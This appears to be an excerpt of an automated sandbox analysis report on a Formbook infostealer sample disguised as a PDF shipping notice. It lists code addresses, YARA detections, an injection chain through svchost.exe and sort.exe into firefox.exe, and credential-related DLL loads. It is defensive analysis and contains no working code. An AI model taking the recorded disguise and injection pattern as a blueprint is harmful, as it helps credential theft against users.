Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03649950	8_2_03649950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0365B950	8_2_0365B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036429A0	8_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0370A9A6	8_2_0370A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03642840	8_2_03642840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0364A840	8_2_0364A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036AD800	8_2_036AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036438E0	8_2_036438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0366E8F0	8_2_0366E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036268B8	8_2_036268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036B4F40	8_2_036B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03682F28	8_2_03682F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03660F30	8_2_03660F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036FFF09	8_2_036FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0364CFE0	8_2_0364CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03632FC8	8_2_03632FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036FFFB1	8_2_036FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03641F92	8_2_03641F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03640E59	8_2_03640E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036FEE26	8_2_036FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036FEEDB	8_2_036FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03649EB0	8_2_03649EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03652E90	8_2_03652E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036FCE93	8_2_036FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036F7D73	8_2_036F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03643D40	8_2_03643D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036F1D5A	8_2_036F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0364AD00	8_2_0364AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0363ADE0	8_2_0363ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0365FDC0	8_2_0365FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03658DBF	8_2_03658DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036B9C32	8_2_036B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03640C00	8_2_03640C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03630CF2	8_2_03630CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036FFCF2	8_2_036FFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036E0CB5	8_2_036E0CB5
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_0394739A	11_2_0394739A
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_0390E3F0	11_2_0390E3F0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039C03E6	11_2_039C03E6
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039B132D	11_2_039B132D
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_038ED34C	11_2_038ED34C
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039BA352	11_2_039BA352
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039052A0	11_2_039052A0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_0391B2C0	11_2_0391B2C0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039A12ED	11_2_039A12ED
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039A0274	11_2_039A0274
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_0390B1B0	11_2_0390B1B0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039C01AA	11_2_039C01AA
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039B81CC	11_2_039B81CC
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_0399A118	11_2_0399A118
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_038F0100	11_2_038F0100
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039CB16B	11_2_039CB16B
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_038EF172	11_2_038EF172
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_0393516C	11_2_0393516C
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039070C0	11_2_039070C0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039AF0CC	11_2_039AF0CC
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039B70E9	11_2_039B70E9
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039BF0E0	11_2_039BF0E0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039BF7B0	11_2_039BF7B0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_038FC7C0	11_2_038FC7C0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03924750	11_2_03924750
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03900770	11_2_03900770
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039B16CC	11_2_039B16CC
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_0391C6E0	11_2_0391C6E0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039C0591	11_2_039C0591
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_0399D5B0	11_2_0399D5B0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03900535	11_2_03900535
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039B7571	11_2_039B7571
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039AE4F6	11_2_039AE4F6
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039BF43F	11_2_039BF43F
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039B2446	11_2_039B2446
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_038F1460	11_2_038F1460
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_0391FB80	11_2_0391FB80
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039B6BD7	11_2_039B6BD7
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_0393DBF9	11_2_0393DBF9
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039BAB40	11_2_039BAB40
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039BFB76	11_2_039BFB76
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_038FEA80	11_2_038FEA80
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03945AA0	11_2_03945AA0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_0399DAAC	11_2_0399DAAC
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039ADAC6	11_2_039ADAC6
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039BFA49	11_2_039BFA49
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039B7A46	11_2_039B7A46
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03973A6C	11_2_03973A6C
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039029A0	11_2_039029A0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039CA9A6	11_2_039CA9A6
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03909950	11_2_03909950
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_0391B950	11_2_0391B950
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03916962	11_2_03916962
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_038E68B8	11_2_038E68B8
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_0392E8F0	11_2_0392E8F0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039038E0	11_2_039038E0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_0396D800	11_2_0396D800
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03902840	11_2_03902840
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_0390A840	11_2_0390A840
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03901F92	11_2_03901F92
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039BFFB1	11_2_039BFFB1
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_038F2FC8	11_2_038F2FC8
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_0390CFE0	11_2_0390CFE0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039BFF09	11_2_039BFF09
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03920F30	11_2_03920F30
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03942F28	11_2_03942F28
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03974F40	11_2_03974F40
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03912E90	11_2_03912E90
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039BCE93	11_2_039BCE93
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03909EB0	11_2_03909EB0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039BEEDB	11_2_039BEEDB
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039BEE26	11_2_039BEE26
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03900E59	11_2_03900E59
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03918DBF	11_2_03918DBF
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_0391FDC0	11_2_0391FDC0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_038FADE0	11_2_038FADE0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_0390AD00	11_2_0390AD00
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039B1D5A	11_2_039B1D5A
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03903D40	11_2_03903D40
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039B7D73	11_2_039B7D73
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039A0CB5	11_2_039A0CB5
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039BFCF2	11_2_039BFCF2
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_038F0CF2	11_2_038F0CF2
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03900C00	11_2_03900C00
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03979C32	11_2_03979C32
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_02F81740	11_2_02F81740
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_02F7C660	11_2_02F7C660
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_02F7C65A	11_2_02F7C65A
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_02F9B470	11_2_02F9B470
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_02F7A8F9	11_2_02F7A8F9
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_02F7C880	11_2_02F7C880
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_02F7A900	11_2_02F7A900
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_02F82FE0	11_2_02F82FE0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_02F82FDB	11_2_02F82FDB
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_02F84DF0	11_2_02F84DF0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_037BE3D4	11_2_037BE3D4
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_037BE2B6	11_2_037BE2B6
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_037BE76C	11_2_037BE76C
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_037BD7D8	11_2_037BD7D8
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_037BCA88	11_2_037BCA88
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_037BE8F2	11_2_037BE8F2
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	Code function: 12_2_05333D4A	12_2_05333D4A
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	Code function: 12_2_05333D4F	12_2_05333D4F
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	Code function: 12_2_0532D5EF	12_2_0532D5EF
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	Code function: 12_2_053324AF	12_2_053324AF
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	Code function: 12_2_0532B668	12_2_0532B668
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	Code function: 12_2_0532B66F	12_2_0532B66F
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	Code function: 12_2_0534C1DF	12_2_0534C1DF
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	Code function: 12_2_05335B5F	12_2_05335B5F
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	Code function: 12_2_0532D3C9	12_2_0532D3C9
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	Code function: 12_2_0532D3CF	12_2_0532D3CF
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 14_2_00000221B5F3F7D8	14_2_00000221B5F3F7D8
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 14_2_00000221B5F403D4	14_2_00000221B5F403D4
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 14_2_00000221B5F4076C	14_2_00000221B5F4076C
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 14_2_00000221B5F402B6	14_2_00000221B5F402B6
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 14_2_00000221B5F3EA88	14_2_00000221B5F3EA88
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 14_2_00000221B5F408F2	14_2_00000221B5F408F2

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03675130 appears 36 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 036BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 036AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0362B970 appears 265 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03687E54 appears 89 times
Source: C:\Windows\SysWOW64\sort.exe	Code function: String function: 0397F290 appears 105 times
Source: C:\Windows\SysWOW64\sort.exe	Code function: String function: 038EB970 appears 263 times
Source: C:\Windows\SysWOW64\sort.exe	Code function: String function: 03947E54 appears 89 times
Source: C:\Windows\SysWOW64\sort.exe	Code function: String function: 0396EA12 appears 84 times
Source: C:\Windows\SysWOW64\sort.exe	Code function: String function: 03935130 appears 36 times

Uses 32bit PE files

Source: shipping notification_pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Yara signature match

Source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.3145640924.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.3145353643.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.1552092799.0000000004350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.3146774474.0000000005310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.1548607953.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.3145239455.00000000036B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: AVyNLNHPrma.exe, 0000000C.00000002.3144473243.00000000010D8000.00000004.00000020.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000000.1614812981.00000000010D8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ;.VBp

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@11/7

Source: C:\Users\user\Desktop\shipping notification_pdf.exe

File created: C:\Users\user~1\AppData\Local\Temp\surmount

Source: unknown	Process created: C:\Users\user\Desktop\shipping notification_pdf.exe "C:\Users\user\Desktop\shipping notification_pdf.exe"
Source: C:\Users\user\Desktop\shipping notification_pdf.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\shipping notification_pdf.exe"
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	Process created: C:\Windows\SysWOW64\sort.exe "C:\Windows\SysWOW64\sort.exe"
Source: C:\Windows\SysWOW64\sort.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\shipping notification_pdf.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\shipping notification_pdf.exe"	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	Process created: C:\Windows\SysWOW64\sort.exe "C:\Windows\SysWOW64\sort.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\shipping notification_pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping notification_pdf.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping notification_pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping notification_pdf.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping notification_pdf.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping notification_pdf.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping notification_pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping notification_pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping notification_pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping notification_pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping notification_pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sort.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_004019DD push esp; retn D083h	8_2_004019EA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_004180C7 push ebp; ret	8_2_00418091
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_004160F4 push edx; ret	8_2_004160F2
